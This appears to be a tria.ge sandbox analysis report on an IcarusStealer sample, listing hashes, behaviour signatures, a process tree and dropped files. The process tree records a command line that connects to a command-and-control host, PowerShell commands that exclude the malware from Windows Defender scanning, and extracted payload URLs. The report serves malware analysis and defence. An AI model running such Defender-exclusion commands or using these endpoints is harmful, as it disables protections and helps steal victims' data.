Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

c0e9809fcc...cb.exe

windows7-x64

10

c0e9809fcc...cb.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10/03/2024, 02:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c0e9809fcc4b0347e9257a16d71eeecb.exe

  • Size

    494KB

  • MD5

    c0e9809fcc4b0347e9257a16d71eeecb

  • SHA1

    45dd5e7f29e2939de5fb6bd7efe1cf59b6170dd7

  • SHA256

    723eff54d04dabd806c06190b582ccaba96836d923ce2d49fef537ba3568669a

  • SHA512

    a24ee93e7978f5075fed12c04e1100e94123df5f11c7e4e81821ac929a411e0a39b86248d1fb6bd89e09cb8835351cd2e06911041aea1c8ba34c75d274a21ba6

  • SSDEEP

    12288:uX4axuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qq:uX5/6N6LqQzJqkd

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 29 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\c0e9809fcc4b0347e9257a16d71eeecb.exe
    "C:\Users\Admin\AppData\Local\Temp\c0e9809fcc4b0347e9257a16d71eeecb.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s5hc51qx\s5hc51qx.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES122A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC79EE51B870B24A689D372EAC06B79AE.TMP"
        3⤵
          PID:2628
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3036
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          3⤵
            PID:2568
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client should-nutritional.gl.at.ply.gg 22817 PUGlcQLxe
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2556
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2736
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2120
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2440
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2896
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
          2⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2608
          • C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
            C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2300

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RES122A.tmp
        Filesize

        1KB

        MD5

        c9aa7a38880ae99367f4eb86a5039163

        SHA1

        909cdf9f03571d275e069073f6b665c67d41f88f

        SHA256

        0a5c5d0eb9219c745e03e1898bdb96b2d1c2bd382581b15a6cdba6f51a27a32b

        SHA512

        88c1a6a4871c7da4376ebfd3b230625625a41557302e7d823f2add8b6d4fad05a1af00e0e0bf3541d03aeba307c80cc2a22bb9b2623609ee5cca9e7768a442e1

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHWLC6968A4D7RTC3BJ3.temp
        Filesize

        7KB

        MD5

        55b4e0c8b05b9ac967ce962a48044dea

        SHA1

        f2c15c6a1fb95b34ebc251e9fd6b14d635b005d2

        SHA256

        f5d331d730bd9a7d5b29851d06ea06dfc5d46f02bb22528caa351804c471abfb

        SHA512

        df3473d41652a7c4b512f3e223847d25c4898ecee4ba11bae1d4dd4e1aa6a525bf289c143081e8a78ce41c0f4a2b556b08ff89726448706744bdec8d9a4c60fd

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\CSC79EE51B870B24A689D372EAC06B79AE.TMP
        Filesize

        1KB

        MD5

        6d4e315ddb659723cf270858a8023839

        SHA1

        0df893c7f7f48483e29d8db81bfabc8456ba24a9

        SHA256

        f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0

        SHA512

        70a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\s5hc51qx\s5hc51qx.0.cs
        Filesize

        1KB

        MD5

        14846c9faaef9299a1bf17730f20e4e6

        SHA1

        8083da995cfaa0e8e469780e32fcff1747850eb6

        SHA256

        61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

        SHA512

        549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\s5hc51qx\s5hc51qx.cmdline
        Filesize

        449B

        MD5

        8e68ad8734c831b18f1668655e1368df

        SHA1

        23c634c29eecf17cadbdd04c0d5b1a2f88605239

        SHA256

        b8764c4380584e0ac64e9c5c9ebd31d513a08bf76e38c7b9923138fc45a6b1d3

        SHA512

        a5a379a98d2fce8da9f6bc325744727a3adcf65a5f7facfe8cb8187bdbc48f7d816b17435958a9dc55b12b2600f333e76491126aef80e6aafbbcd9f336f50f84

        Download Submit

      • \Users\Admin\AppData\Local\Temp\cvtresa.exe
        Filesize

        4KB

        MD5

        5265f303d7970c7f70ee90787f45aadf

        SHA1

        5a25394bf66d4ad10610059cd7f9d075d4c10523

        SHA256

        f0c8e6e2d3d7ef9c4f363c0c4478c72f63f7b9328032a3bf0b41e3962af62b17

        SHA512

        3ccd39e75de389e5474153ec521c4dcb87185b90075ef984fe0d6fda8f28ad7bf6e7fc5a2bf1f6cfe9aac36c3a299ab49444885ffdd1957d63e34e33c78b07c8

        Download Submit

      • memory/2120-51-0x000000006EEA0000-0x000000006F44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2120-40-0x000000006EEA0000-0x000000006F44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2120-47-0x00000000002E0000-0x0000000000320000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2120-45-0x00000000002E0000-0x0000000000320000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2120-42-0x000000006EEA0000-0x000000006F44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2120-41-0x00000000002E0000-0x0000000000320000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2300-39-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2300-31-0x00000000013A0000-0x00000000013A8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2300-55-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2300-56-0x000000001ACB0000-0x000000001AD30000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2300-52-0x000000001ACB0000-0x000000001AD30000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2556-20-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2556-30-0x0000000000F70000-0x0000000000FB0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2556-28-0x0000000074600000-0x0000000074CEE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2556-19-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2556-17-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2556-18-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2556-15-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2556-22-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2556-24-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2556-54-0x0000000074600000-0x0000000074CEE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2556-16-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2792-44-0x0000000074600000-0x0000000074CEE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2792-2-0x0000000004BE0000-0x0000000004C20000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2792-0-0x0000000000060000-0x00000000000E2000-memory.dmp

        Filesize

        520KB

        Download

      • memory/2792-1-0x0000000074600000-0x0000000074CEE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2896-43-0x000000006EEA0000-0x000000006F44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2896-50-0x000000006EEA0000-0x000000006F44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2896-49-0x000000006EEA0000-0x000000006F44B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2896-48-0x0000000001C50000-0x0000000001C90000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2896-46-0x0000000001C50000-0x0000000001C90000-memory.dmp

        Filesize

        256KB

        Download

      • memory/3036-53-0x0000000004190000-0x0000000004191000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3036-57-0x0000000004190000-0x0000000004191000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3036-61-0x00000000029C0000-0x00000000029D0000-memory.dmp

        Filesize

        64KB

        Download